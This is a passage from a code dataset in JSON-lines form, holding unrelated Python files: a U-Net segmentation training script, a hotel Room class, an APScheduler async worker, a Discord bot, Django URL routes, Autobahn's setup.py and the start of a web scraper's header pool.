img_array[img_array[..., -1] != 0] = [255, 255, 255, 255]\n # img_array = cv2.medianBlur(img_array, 5)\n\n img_bw = Image.fromarray(img_array)\n\n # img_bw = img_bw.filter(ImageFilter.MedianFilter(size=3))\n for i in tqdm(range(n_examples)):\n svg_code = panavatar.get_svg(size[0], size[1])\n svg2png(bytestring=svg_code, write_to=os.path.join(str(input_img_path), '{}.png'.format(i)))\n input_image = Image.open(os.path.join(str(input_img_path), '{}.png'.format(i)))\n\n target_image = Image.new(\"RGB\", size, (0, 0, 0))\n img_c = img.copy()\n\n x_offset = random.randint(-50, 50)\n y_offset = random.randint(-50, 50)\n\n random_rot = random.randint(-45, 45)\n\n img_w, img_h = img.size\n bg_w, bg_h = target_image.size\n\n offset = ((bg_w - img_w) // 2+ x_offset, (bg_h - img_h) // 2+ y_offset)\n img_c = img_c.rotate(random_rot, expand=0)\n\n img_bw_c = img_bw.copy()\n\n img_bw_c = img_bw_c.rotate(random_rot, expand=0)\n\n input_image.paste(img_c, offset, img_c)\n target_image.paste(img_bw_c, offset, img_bw_c)\n\n input_image.save(os.path.join(str(input_img_path), \"{}.png\".format(i)))\n target_image.save(os.path.join(str(output_img_path), \"{}.png\".format(i)))\n\n\ndef calculate_area_of_overlap(img_1, img_2):\n \"\"\"Calculate area of overlap\"\"\"\n img1 = img_1.copy()\n img2 = img_2.copy()\n img1[img1 == 255] = 1\n img1[img1 == 0] = 0\n img2[img2 == 255] = 1\n img2[img2 == 0] = -1\n aoo = np.sum(img1.flatten() == img2.flatten())\n return aoo\n\n\ndef not_overlapping(prev_img, candidate, offset):\n prev_img_c = prev_img.copy()\n candidate_c = candidate.copy()\n cand_img = Image.new(\"RGB\", size, (0, 0, 0))\n cand_img.paste(candidate_c, offset, candidate_c)\n return calculate_area_of_overlap(np.array(prev_img_c),np.array(cand_img))==0\n\ndef prepare_data2(input_img_path, output_img_path, n_examples):\n os.makedirs(str(input_img_path), exist_ok=True)\n os.makedirs(str(output_img_path), exist_ok=True)\n\n icons_img_paths = glob.glob(\n os.path.join(str(icons_paths), \"*.png\")\n )\n\n for i in tqdm(range(n_examples)):\n icons_rand_sample_paths = random.choice(icons_img_paths, random.randint(1,5))\n\n svg_code = panavatar.get_svg(size[0], size[1])\n svg2png(bytestring=svg_code, write_to=os.path.join(str(input_img_path), '{}.png'.format(i)))\n input_image = Image.open(os.path.join(str(input_img_path), '{}.png'.format(i)))\n target_image = Image.new(\"RGB\", size, (0, 0, 0))\n j = 0\n while j < len(icons_rand_sample_paths):\n file_name = os.path.basename(icons_rand_sample_paths[j]).split(\".\",1)[0]\n img = Image.open(icons_rand_sample_paths[j])\n img = img.resize((50, 50))\n img_bw = img.copy()\n img_array = np.array(img_bw)\n img_array[img_array[..., -1] != 0] = [255, 255, 255, 255]\n\n img_bw = Image.fromarray(img_array)\n\n img_c = img.copy()\n\n x_offset = random.randint(-80, 80)\n y_offset = random.randint(-80, 80)\n\n random_rot = random.randint(-45, 45)\n\n img_w, img_h = img.size\n bg_w, bg_h = target_image.size\n\n offset = ((bg_w - img_w) // 2+ x_offset, (bg_h - img_h) // 2+ y_offset)\n img_c = img_c.rotate(random_rot, expand=0)\n\n img_bw_c = img_bw.copy()\n\n img_bw_c = img_bw_c.rotate(random_rot, expand=0)\n\n target_image_copy = target_image.copy()\n\n if not_overlapping(prev_img = target_image_copy, candidate=img_bw_c,offset = offset) or j == 0:\n input_image.paste(img_c, offset, img_c)\n if file_name in target_icons:\n target_image.paste(img_bw_c, offset, img_bw_c)\n j = j+1\n\n input_image.save(os.path.join(str(input_img_path), \"{}.png\".format(i)))\n target_image.save(os.path.join(str(output_img_path), \"{}.png\".format(i)))\n\n\ndef get_data(images_path, segs_path):\n input_image_paths = glob.glob(os.path.join(images_path, \"*.jpg\")) + glob.glob(\n os.path.join(images_path, \"*.png\")\n )\n input_image_paths.sort()\n segmentation_image_paths = glob.glob(os.path.join(segs_path, \"*.jpg\")) + glob.glob(\n os.path.join(segs_path, \"*.png\")\n )\n\n segmentation_image_paths.sort()\n\n\nclass DataGenerator(keras.utils.Sequence):\n\n def __init__(self, input_filenames, target_filenames, batch_size):\n self.input_filenames = input_filenames\n self.target_filenames = target_filenames\n self.batch_size = batch_size\n\n def __len__(self):\n return (np.ceil(len(self.input_filenames) / float(self.batch_size))).astype(np.int)\n\n def __getitem__(self, idx):\n batch_x_files = self.input_filenames[idx * self.batch_size: (idx + 1) * self.batch_size]\n batch_y_files = self.target_filenames[idx * self.batch_size: (idx + 1) * self.batch_size]\n\n x = []\n y = []\n\n for i in range(len(batch_x_files)):\n input_image = np.array(Image.open(batch_x_files[i]).convert(\"RGB\"))\n input_image = cv2.resize(input_image, (size[0], size[1]))\n\n input_image = preprocess_input(input_image)\n\n target_image = cv2.imread(batch_y_files[i], 1)\n target_image = cv2.resize(target_image,(size[0], size[1]))\n\n target_image = preprocess_segmentation_image(target_image)\n x.append(input_image)\n y.append(target_image)\n x = np.array(x)\n y = np.array(y)\n\n return x, y\n\n\n\nif __name__ == '__main__':\n prepare_data2(train_images_path, train_segs_path,100)\n # binary segmentation (this parameters are default when you call Unet('resnet34')\n\n model = sm.Unet(BACKBONE, classes=1, activation='sigmoid', encoder_weights='imagenet')\n\n model.compile(\n optimizer=Adam(),\n loss=\"binary_crossentropy\",\n metrics=[\"binary_accuracy\"],\n )\n\n input_image_paths = glob.glob(\n os.path.join(str(train_images_path), \"*.png\")\n )\n input_image_paths.sort()\n\n segmentation_image_paths = glob.glob(\n os.path.join(str(train_segs_path), \"*.png\")\n )\n\n segmentation_image_paths.sort()\n\n x_train_files, x_test_files, y_train_files, y_test_files = train_test_split(input_image_paths, segmentation_image_paths, test_size=0.2, random_state=42)\n\n training_generator = DataGenerator(x_train_files, y_train_files , batch_size=64)\n\n validation_generator = DataGenerator(x_test_files, y_test_files , batch_size=64)\n\n history = model.fit_generator(generator=training_generator,\n validation_data=validation_generator, epochs=100)\n\n fig = plt.figure()\n plt.plot(history.history['loss'])\n plt.plot(history.history['val_loss'])\n plt.title('model loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['train', 'test'], loc='upper left')\n fig.savefig('loss_test_20_epochs.png')\n model.save('model.h5')\n\n\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"474398730","text":"class Room:\n\n def __init__(self, number, capacity):\n self.number = number\n self.capacity = capacity\n self.guests = 0\n self.is_taken = False\n\n def take_room(self, people):\n if self.capacity >= people and not self.is_taken:\n self.guests += people\n self.is_taken = True\n return f\"Room number {self.number} cannot be taken\"\n\n def free_room(self):\n if self.is_taken:\n self.guests = 0\n self.is_taken = False\n else:\n return f\"Room number {self.number} is not taken\"\n\n\n# Testing\n# room = Room(101, 5)\n# room.take_room(4)\n# print(room.guests)\n# room.free_room()\n# print(room.guests)\n# print(room.free_room())\n","sub_path":"attributes_and_methods_lecture3/LAB/project/room.py","file_name":"room.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"605480951","text":"from __future__ import annotations\n\nimport os\nimport platform\nfrom contextlib import AsyncExitStack\nfrom datetime import datetime, timezone\nfrom inspect import isawaitable\nfrom logging import Logger, getLogger\nfrom traceback import format_tb\nfrom typing import Any, Callable, Iterable, Optional, Set, Type, Union\nfrom uuid import UUID\n\nimport anyio\nfrom anyio import TASK_STATUS_IGNORED, create_task_group, get_cancelled_exc_class\nfrom anyio.abc import CancelScope, TaskGroup\n\nfrom ..abc import AsyncDataStore, DataStore, EventSource, Job\nfrom ..adapters import AsyncDataStoreAdapter\nfrom ..enums import RunState\nfrom ..events import (\n AsyncEventHub, Event, JobAdded, JobCompleted, JobDeadlineMissed, JobFailed, JobStarted,\n SubscriptionToken, WorkerStarted, WorkerStopped)\n\n\nclass AsyncWorker(EventSource):\n \"\"\"Runs jobs locally in a task group.\"\"\"\n\n _task_group: Optional[TaskGroup] = None\n _stop_event: Optional[anyio.Event] = None\n _state: RunState = RunState.stopped\n _acquire_cancel_scope: Optional[CancelScope] = None\n _datastore_subscription: SubscriptionToken\n _wakeup_event: anyio.Event\n\n def __init__(self, data_store: Union[DataStore, AsyncDataStore], *,\n max_concurrent_jobs: int = 100, identity: Optional[str] = None,\n logger: Optional[Logger] = None):\n self.max_concurrent_jobs = max_concurrent_jobs\n self.identity = identity or f'{platform.node()}-{os.getpid()}-{id(self)}'\n self.logger = logger or getLogger(__name__)\n self._acquired_jobs: Set[Job] = set()\n self._exit_stack = AsyncExitStack()\n self._events = AsyncEventHub()\n self._running_jobs: Set[UUID] = set()\n\n if self.max_concurrent_jobs < 1:\n raise ValueError('max_concurrent_jobs must be at least 1')\n\n if isinstance(data_store, DataStore):\n self.data_store = AsyncDataStoreAdapter(data_store)\n else:\n self.data_store = data_store\n\n @property\n def state(self) -> RunState:\n return self._state\n\n async def __aenter__(self):\n self._state = RunState.starting\n self._wakeup_event = anyio.Event()\n await self._exit_stack.__aenter__()\n await self._exit_stack.enter_async_context(self._events)\n\n # Initialize the data store\n await self._exit_stack.enter_async_context(self.data_store)\n relay_token = self._events.relay_events_from(self.data_store)\n self._exit_stack.callback(self.data_store.unsubscribe, relay_token)\n\n # Wake up the worker if the data store emits a significant job event\n wakeup_token = self.data_store.subscribe(\n lambda event: self._wakeup_event.set(), {JobAdded})\n self._exit_stack.callback(self.data_store.unsubscribe, wakeup_token)\n\n # Start the actual worker\n self._task_group = create_task_group()\n await self._exit_stack.enter_async_context(self._task_group)\n await self._task_group.start(self.run)\n return self\n\n async def __aexit__(self, exc_type, exc_val, exc_tb):\n self._state = RunState.stopping\n self._wakeup_event.set()\n await self._exit_stack.__aexit__(exc_type, exc_val, exc_tb)\n del self._task_group\n del self._wakeup_event\n\n def subscribe(self, callback: Callable[[Event], Any],\n event_types: Optional[Iterable[Type[Event]]] = None) -> SubscriptionToken:\n return self._events.subscribe(callback, event_types)\n\n def unsubscribe(self, token: SubscriptionToken) -> None:\n self._events.unsubscribe(token)\n\n async def run(self, *, task_status=TASK_STATUS_IGNORED) -> None:\n if self._state is not RunState.starting:\n raise RuntimeError(f'This function cannot be called while the worker is in the '\n f'{self._state} state')\n\n # Signal that the worker has started\n self._state = RunState.started\n task_status.started()\n self._events.publish(WorkerStarted())\n\n try:\n while self._state is RunState.started:\n limit = self.max_concurrent_jobs - len(self._running_jobs)\n with CancelScope() as self._acquire_cancel_scope:\n try:\n jobs = await self.data_store.acquire_jobs(self.identity, limit)\n finally:\n del self._acquire_cancel_scope\n\n for job in jobs:\n self._running_jobs.add(job.id)\n self._task_group.start_soon(self._run_job, job)\n\n await self._wakeup_event.wait()\n self._wakeup_event = anyio.Event()\n except get_cancelled_exc_class():\n pass\n except BaseException as exc:\n self._state = RunState.stopped\n self._events.publish(WorkerStopped(exception=exc))\n raise\n\n self._state = RunState.stopped\n self._events.publish(WorkerStopped())\n\n # async def _run_job(self, job: Job) -> None:\n # # Check if the job started before the deadline\n # start_time = datetime.now(timezone.utc)\n # if job.start_deadline is not None and start_time > job.start_deadline:\n # event = JobDeadlineMissed(\n # timestamp=datetime.now(timezone.utc), job_id=job.id, task_id=job.task_id,\n # schedule_id=job.schedule_id, scheduled_fire_time=job.scheduled_fire_time,\n # start_time=start_time, start_deadline=job.start_deadline)\n # self._events.publish(event)\n # return\n #\n # now = datetime.now(timezone.utc)\n # if job.start_deadline is not None:\n # if now.timestamp() > job.start_deadline.timestamp():\n # self.logger.info('Missed the deadline of job %r', job.id)\n # event = JobDeadlineMissed(\n # now, job_id=job.id, task_id=job.task_id, schedule_id=job.schedule_id,\n # scheduled_fire_time=job.scheduled_fire_time, start_time=now,\n # start_deadline=job.start_deadline\n # )\n # await self.publish(event)\n # return\n #\n # # Set the job as running and publish a job update event\n # self.logger.info('Started job %r', job.id)\n # job.started_at = now\n # event = JobUpdated(\n # timestamp=now, job_id=job.id, task_id=job.task_id, schedule_id=job.schedule_id\n # )\n # await self.publish(event)\n #\n # self._num_running_jobs += 1\n # try:\n # return_value = await self._call_job_func(job.func, job.args, job.kwargs)\n # except BaseException as exc:\n # self.logger.exception('Job %r raised an exception', job.id)\n # event = JobFailed(\n # timestamp=datetime.now(timezone.utc), job_id=job.id, task_id=job.task_id,\n # schedule_id=job.schedule_id, scheduled_fire_time=job.scheduled_fire_time,\n # start_time=now, start_deadline=job.start_deadline,\n # traceback=format_exc(), exception=exc\n # )\n # else:\n # self.logger.info('Job %r completed successfully', job.id)\n # event = JobSuccessful(\n # timestamp=datetime.now(timezone.utc), job_id=job.id, task_id=job.task_id,\n # schedule_id=job.schedule_id, scheduled_fire_time=job.scheduled_fire_time,\n # start_time=now, start_deadline=job.start_deadline, return_value=return_value\n # )\n #\n # self._num_running_jobs -= 1\n # await self.data_store.release_jobs(self.identity, [job])\n # await self.publish(event)\n #\n # async def _call_job_func(self, func: Callable, args: tuple, kwargs: Dict[str, Any]):\n # if not self.run_sync_functions_in_event_loop and not iscoroutinefunction(func):\n # wrapped = partial(func, *args, **kwargs)\n # return await to_thread.run_sync(wrapped)\n #\n # return_value = func(*args, **kwargs)\n # if isinstance(return_value, Coroutine):\n # return_value = await return_value\n #\n # return return_value\n\n async def _run_job(self, job: Job) -> None:\n event: Event\n try:\n # Check if the job started before the deadline\n start_time = datetime.now(timezone.utc)\n if job.start_deadline is not None and start_time > job.start_deadline:\n event = JobDeadlineMissed(\n timestamp=datetime.now(timezone.utc), job_id=job.id, task_id=job.task_id,\n schedule_id=job.schedule_id, scheduled_fire_time=job.scheduled_fire_time,\n start_time=start_time, start_deadline=job.start_deadline)\n self._events.publish(event)\n return\n\n event = JobStarted(\n timestamp=datetime.now(timezone.utc), job_id=job.id, task_id=job.task_id,\n schedule_id=job.schedule_id, scheduled_fire_time=job.scheduled_fire_time,\n start_time=start_time, start_deadline=job.start_deadline)\n self._events.publish(event)\n try:\n retval = job.func(*job.args, **job.kwargs)\n if isawaitable(retval):\n retval = await retval\n except BaseException as exc:\n if exc.__class__.__module__ == 'builtins':\n exc_name = exc.__class__.__qualname__\n else:\n exc_name = f'{exc.__class__.__module__}.{exc.__class__.__qualname__}'\n\n formatted_traceback = '\\n'.join(format_tb(exc.__traceback__))\n event = JobFailed(\n timestamp=datetime.now(timezone.utc), job_id=job.id, task_id=job.task_id,\n schedule_id=job.schedule_id, scheduled_fire_time=job.scheduled_fire_time,\n start_time=start_time, start_deadline=job.start_deadline, exception=exc_name,\n traceback=formatted_traceback)\n self._events.publish(event)\n else:\n event = JobCompleted(\n timestamp=datetime.now(timezone.utc), job_id=job.id, task_id=job.task_id,\n schedule_id=job.schedule_id, scheduled_fire_time=job.scheduled_fire_time,\n start_time=start_time, start_deadline=job.start_deadline, return_value=retval)\n self._events.publish(event)\n finally:\n self._running_jobs.remove(job.id)\n await self.data_store.release_jobs(self.identity, [job])\n\n # async def stop(self, force: bool = False) -> None:\n # self._running = False\n # if self._acquire_cancel_scope:\n # self._acquire_cancel_scope.cancel()\n #\n # if force and self._task_group:\n # self._task_group.cancel_scope.cancel()\n #\n # async def wait_until_stopped(self) -> None:\n # if self._stop_event:\n # await self._stop_event.wait()\n","sub_path":"src/apscheduler/workers/async_.py","file_name":"async_.py","file_ext":"py","file_size_in_byte":11010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"651069147","text":"#https://github.com/Rapptz/discord.py\r\nimport discord\r\nimport discord.ext\r\nimport asyncio\r\nfrom discord import Game\r\nfrom discord.ext.commands import Bot\r\nfrom discord.ext import commands\r\nimport random\r\nimport os\r\nimport sys\r\nfrom tkinter import *\r\nfrom subprocess import call\r\n\r\n\r\n\r\nclient = discord.Client()\r\n\r\n@client.event\r\nasync def on_message(message):\r\n if message.author == client.user:\r\n return\r\n#LOGOS COMMANDS \r\n if message.content.upper().startswith('-1ST LOGO'):\r\n embed = discord.Embed(title=\"The Deer\", description=\"A deer folowed by are name and slogon!\", color=0x8A2BE2) \r\n embed.set_image(url=\"https://media.discordapp.net/attachments/482488997562810372/484291921695473665/Capture.PNG\")\r\n await client.send_message(message.channel, embed=embed)\r\n if message.content.upper().startswith('-2ND LOGO'):\r\n embed = discord.Embed(title=\"The Paint Splash\", description=\"A splash of paint on a wall followed by are name and Slogon!\", color=0x8A2BE2)\r\n embed.set_image(url=\"https://media.discordapp.net/attachments/482488997562810372/484291857078288384/logo-preview-6645700b-398a-4c93-946a-b643ac9d11dc.jpg?width=300&height=300\")\r\n await client.send_message(message.channel, embed=embed)\r\n\r\n if message.content.upper().startswith('-3RD LOGO'):\r\n embed = discord.Embed(title=\"The Crossed Arrows\", description=\"2 arrows crossed followed by are name and slogon!\", color=0x8A2BE2) \r\n embed.set_image(url=\"https://media.discordapp.net/attachments/482488997562810372/484291855186395136/logo-preview-51aa1a3b-a500-496c-bbf9-48bc6ae9a402.jpg?width=300&height=300\")\r\n await client.send_message(message.channel, embed=embed)\r\n\r\n#STAFF APP COMMAND\r\n if message.content.upper().startswith('-STAFFAPP'):\r\n embed = discord.Embed(title=\"Staff Application\", description=\"Click the link to be redirected to google were you can apply to be staff!\", color=0x2B8AE2) \r\n embed.add_field(name=\"Google Link\", value=\"https://goo.gl/forms/NZuAAgVgQjU6NX743\", inline=True)\r\n await client.send_message(message.channel, embed=embed)\r\n await client.delete_message(message)\r\n\r\n#COPY AND PASTE BELOW FOR EASY TEMPLATEs\r\n\r\n#Embed\r\n \r\n#Line splitter \\n\r\n \r\n#SImple if's\r\n if 'VOIDED Grass(BLOCKER)' in message.content:\r\n userID = message.author.id\r\n await client.send_message(message.channel, \"<@%s> Type -help for a list of out commands!\" % (userID))\r\n await client.delete_message(message) \r\n\r\n#INVITE LINK\r\n if message.content.upper().startswith('-INV'):\r\n embed = discord.Embed(title=\"Here is the invite link for our server!\", description=\"https://discord.gg/e9jwv6z\", color=0xeef442)\r\n await client.send_message(message.channel, embed=embed)\r\n\r\n\r\n#List of commands\r\n \r\n if message.content.upper().startswith('-HELP'):\r\n embed = discord.Embed(title=\"Here is a list of commands you can enter!\", description=\"More commands will be added soon!\", color=0xeeff00)\r\n embed.add_field(name=\"Commands\", value=\"-Staffapp \\n This is a link to are application for staff. \\n -Inv \\n This will instantly give you the invite link for our server. \\n -1stLogo \\n This will show 1 of 3 logo designs too wich one of them will eventually be the main logo. \\n -2ndLogo \\n This will show the 2nd of 3 logo designs too wich one of them will eventually be the main logo. \\n -3rdLogo \\n This will show the last of 3 logo designs too wich one of them will eventually be the main logo.\", inline=True)\r\n await client.send_message(message.channel, embed=embed)\r\n if message.content.upper().startswith('-123)'):\r\n embed = discord.Embed(title=\"Here is a list of out commands\", description=\"Evntually there will be more\", color=0xeef442)\r\n embed.add_field(name=\"-StaffApp\", value=\"This is a link to are application for staff.\", inline=True)\r\n embed.add_field(name=\"-Inv\", value=\"This will instantly give you the invite link for our server.\", inline=True)\r\n embed.add_field(name=\"-1stLogo\", value=\"This will show 1 of 3 logo designs too wich one of them will eventually be the main logo..\", inline=True)\r\n embed.add_field(name=\"-2ndLogo\", value=\"This will show the 2nd of 3 logo designs too wich one of them will eventually be the main logo..\", inline=True)\r\n embed.add_field(name=\"-3rdLogo\", value=\"This will show the last of 3 logo designs too wich one of them will eventually be the main logo..\", inline=True)\r\n await client.send_message(message.channel, embed=embed)\r\n\r\n\r\n\r\n if message.content.upper().startswith('!PING'):\r\n userID = message.author.id\r\n await client.send_message(message.channel, \"<@%s> Pong!\" % (userID))\r\n await client.delete_message(message)\r\n\r\n\r\n\r\n if '@484360841894821888' in message.content:\r\n embed = discord.Embed(title=\"Hello Good Morning, Good Evening, Good Night, Good Day you awoke me!\", description=\"Dont do this too often please\", color=0xa0132f)\r\n embed.add_field(name=\"Need Help?\", value=\"Either do -help or contact a staff member!\", inline=True)\r\n await client.send_message(message.channel, embed=embed)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#Login\r\n@client.event\r\nasync def on_ready():\r\n print('Connected')\r\n print('Username: ' + client.user.name)\r\n print('ID: ' + client.user.id)\r\n await client.change_presence(game=Game(name=\"OOps\"))\r\n\r\nclient.run(os.getenv('TOKEN'))\r\n","sub_path":"EMBED_FFS.py","file_name":"EMBED_FFS.py","file_ext":"py","file_size_in_byte":5461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"607053315","text":"from django.urls import path\nfrom . import views\n\n\napp_name = \"costumer\"\n\n\nurlpatterns =[\n path('',views.index,name ='index'),\n path('dashboard/',views.dashboard,name='dashboard'),\n path('add/',views.addcostumer,name='add'),\n path('our_costumer/',views.ourcostumers,name='our_costumer'),\n path('detail//',views.detail,name='detail'),\n path('edit//',views.update,name='update'),\n path('chat/',views.Chating,name='chat'),\n\n]","sub_path":"costumer/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"554534208","text":"###############################################################################\r\n##\r\n## Copyright (C) 2011-2014 Tavendo GmbH\r\n##\r\n## Licensed under the Apache License, Version 2.0 (the \"License\");\r\n## you may not use this file except in compliance with the License.\r\n## You may obtain a copy of the License at\r\n##\r\n## http://www.apache.org/licenses/LICENSE-2.0\r\n##\r\n## Unless required by applicable law or agreed to in writing, software\r\n## distributed under the License is distributed on an \"AS IS\" BASIS,\r\n## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n## See the License for the specific language governing permissions and\r\n## limitations under the License.\r\n##\r\n###############################################################################\r\n\r\nfrom __future__ import absolute_import\r\n\r\nfrom distutils import log\r\n\r\ntry:\r\n from ez_setup import use_setuptools\r\n use_setuptools()\r\nexcept Exception as e:\r\n log.warn(\"ez_setup failed: {0}\".format(e))\r\nfinally:\r\n from setuptools import setup\r\n\r\nimport platform\r\nCPY = platform.python_implementation() == 'CPython'\r\n\r\nimport sys\r\nPY3 = sys.version_info >= (3,)\r\nPY33 = sys.version_info >= (3,3) and sys.version_info < (3,4)\r\n\r\n\r\nLONGSDESC = \"\"\"\r\nAutobahn|Python is a network library implementing\r\n\r\n * The WebSocket Protocol\r\n * The Web Application Messaging Protocol (WAMP)\r\n\r\nfor Twisted and Asyncio on Python 2 and 3.\r\n\r\nAutobahn|Python is part of the Autobahn project:\r\n\r\nThe Autobahn project provides open-source implementations of the\r\nWebSocket and WAMP protocols. WebSocket allows bidirectional real-time\r\nmessaging on the Web and WAMP adds asynchronous Remote Procedure Calls\r\nand Publish & Subscribe on top of WebSocket.\r\n\r\nMore information:\r\n\r\n * https://github.com/tavendo/AutobahnPython/blob/master/README.md\r\n * http://autobahn.ws/python\r\n * http://wamp.ws\r\n\r\nSource code:\r\n\r\n * https://github.com/tavendo/AutobahnPython\r\n\"\"\"\r\n\r\n## get version string from \"autobahn/__init__.py\"\r\n## See: http://stackoverflow.com/a/7071358/884770\r\n##\r\nimport re\r\nVERSIONFILE=\"autobahn/__init__.py\"\r\nverstrline = open(VERSIONFILE, \"rt\").read()\r\nVSRE = r\"^__version__ = ['\\\"]([^'\\\"]*)['\\\"]\"\r\nmo = re.search(VSRE, verstrline, re.M)\r\nif mo:\r\n verstr = mo.group(1)\r\nelse:\r\n raise RuntimeError(\"Unable to find version string in %s.\" % (VERSIONFILE,))\r\n\r\n\r\n## Autobahn core packages\r\n##\r\npackages = ['autobahn',\r\n 'autobahn.wamp',\r\n 'autobahn.wamp.test',\r\n 'autobahn.websocket',\r\n 'autobahn.websocket.test',\r\n 'autobahn.asyncio',\r\n 'autobahn.twisted',\r\n 'twisted.plugins',\r\n 'autobahn.wamp1', # WAMPv1 - remove this later\r\n ]\r\n\r\nif PY3:\r\n if PY33:\r\n ## \"Tulip\"\r\n asyncio_packages = [\"asyncio>=0.2.1\"]\r\n else:\r\n ## Python 3.4+ has asyncio builtin\r\n asyncio_packages = []\r\nelse:\r\n ## backport of asyncio\r\n asyncio_packages = [\"trollius>=0.1.2\", \"futures>=2.1.5\"]\r\n\r\n\r\n## Now install Autobahn ..\r\n##\r\nsetup(\r\n name = 'autobahn',\r\n version = verstr,\r\n description = 'Autobahn|Python provides WebSocket and WAMP for Twisted and Asyncio',\r\n long_description = LONGSDESC,\r\n license = 'Apache License 2.0',\r\n author = 'Tavendo GmbH',\r\n author_email = 'autobahnws@googlegroups.com',\r\n url = 'http://autobahn.ws/python',\r\n platforms = ('Any'),\r\n install_requires = ['six>=1.6.1'],\r\n extras_require = {\r\n ## asyncio is needed for Autobahn/asyncio\r\n 'asyncio': asyncio_packages,\r\n\r\n ## you need Twisted for Autobahn/Twisted - obviously\r\n 'twisted': [\"Twisted>=11.1\"],\r\n\r\n ## native WebSocket and JSON acceleration: this should ONLY be used on CPython\r\n 'accelerate': [\"wsaccel>=0.6.2\", \"ujson>=1.33\"] if CPY else [],\r\n\r\n ## for (non-standard) WebSocket compression methods - not needed if you\r\n ## only want standard WebSocket compression (\"permessage-deflate\")\r\n 'compress': [\"python-snappy>=0.5\", \"lz4>=0.2.1\"],\r\n\r\n ## needed if you want WAMPv2 binary serialization support\r\n 'serialization': [\"msgpack-python>=0.4.0\"]\r\n },\r\n packages = packages,\r\n zip_safe = False,\r\n ## http://pypi.python.org/pypi?%3Aaction=list_classifiers\r\n ##\r\n classifiers = [\"License :: OSI Approved :: Apache Software License\",\r\n \"Development Status :: 5 - Production/Stable\",\r\n \"Environment :: No Input/Output (Daemon)\",\r\n \"Framework :: Twisted\",\r\n \"Intended Audience :: Developers\",\r\n \"Operating System :: OS Independent\",\r\n \"Programming Language :: Python\",\r\n \"Programming Language :: Python :: 2\",\r\n \"Programming Language :: Python :: 2.6\",\r\n \"Programming Language :: Python :: 2.7\",\r\n \"Programming Language :: Python :: 3\",\r\n \"Programming Language :: Python :: 3.3\",\r\n \"Programming Language :: Python :: 3.4\",\r\n \"Programming Language :: Python :: Implementation :: CPython\",\r\n \"Programming Language :: Python :: Implementation :: PyPy\",\r\n \"Programming Language :: Python :: Implementation :: Jython\",\r\n \"Topic :: Internet\",\r\n \"Topic :: Internet :: WWW/HTTP\",\r\n \"Topic :: Communications\",\r\n \"Topic :: System :: Distributed Computing\",\r\n \"Topic :: Software Development :: Libraries\",\r\n \"Topic :: Software Development :: Libraries :: Python Modules\",\r\n \"Topic :: Software Development :: Object Brokering\"],\r\n keywords = 'autobahn autobahn.ws websocket realtime rfc6455 wamp rpc pubsub twisted asyncio'\r\n)\r\n\r\n\r\n\r\ntry:\r\n from twisted.internet import reactor\r\nexcept:\r\n HAS_TWISTED = False\r\nelse:\r\n HAS_TWISTED = True\r\n\r\n\r\nif HAS_TWISTED:\r\n # Make Twisted regenerate the dropin.cache, if possible. This is necessary\r\n # because in a site-wide install, dropin.cache cannot be rewritten by\r\n # normal users.\r\n try:\r\n from twisted.plugin import IPlugin, getPlugins\r\n list(getPlugins(IPlugin))\r\n except Exception as e:\r\n log.warn(\"Failed to update Twisted plugin cache: {}\".format(e))\r\n else:\r\n log.info(\"Twisted dropin.cache regenerated.\")\r\n\r\n ## verify that Autobahn Twisted endpoints have been installed\r\n try:\r\n from twisted.internet.interfaces import IStreamServerEndpointStringParser\r\n from twisted.internet.interfaces import IStreamClientEndpointStringParser\r\n\r\n has_server_endpoint = False\r\n for plugin in getPlugins(IStreamServerEndpointStringParser):\r\n if plugin.prefix == \"autobahn\":\r\n has_server_endpoint = True\r\n break\r\n\r\n if has_server_endpoint:\r\n log.info(\"Autobahn Twisted stream server endpoint successfully installed\")\r\n else:\r\n log.warn(\"Autobahn Twisted stream server endpoint installation seems to have failed\")\r\n\r\n has_client_endpoint = False\r\n for plugin in getPlugins(IStreamClientEndpointStringParser):\r\n if plugin.prefix == \"autobahn\":\r\n has_client_endpoint = True\r\n break\r\n\r\n if has_client_endpoint:\r\n log.info(\"Autobahn Twisted stream client endpoint successfully installed\")\r\n else:\r\n log.warn(\"Autobahn Twisted stream client endpoint installation seems to have failed\")\r\n\r\n except:\r\n log.warn(\"Autobahn Twisted endpoint installation could not be verified\")\r\n","sub_path":"autobahn/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":7526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"218216956","text":"#coding:utf-8\nimport datetime\n\nfrom itertools import islice\nfrom urllib.request import urlopen\n\nfrom multiprocessing import Process\nimport schedule\nimport urllib.request\nimport random\nimport time\nimport json\nimport os\nimport pandas as pd\n\n# print (datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')) #日期格式化\ndef requests_headers(): #构造请求头池\n head_connection = ['Keep-Alive','close']\n head_accept = ['text/html,application/xhtml+xml,*/*']\n head_accept_language = ['zh-CN,fr-FR;q=0.5','en-US,en;q=0.8,zh-Hans-CN;q=0.5,zh-Hans;q=0.3']\n head_user_agent = ['Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko',\n 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36',\n 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; rv:11.0) like Gecko)',\n 'Mozilla/5.0 (Windows; U; Windows NT 5.2) Gecko/2008070208 Firefox/3.0.1',\n 'Mozilla/5.0 (Windows; U; Windows NT 5.1) Gecko/20070309 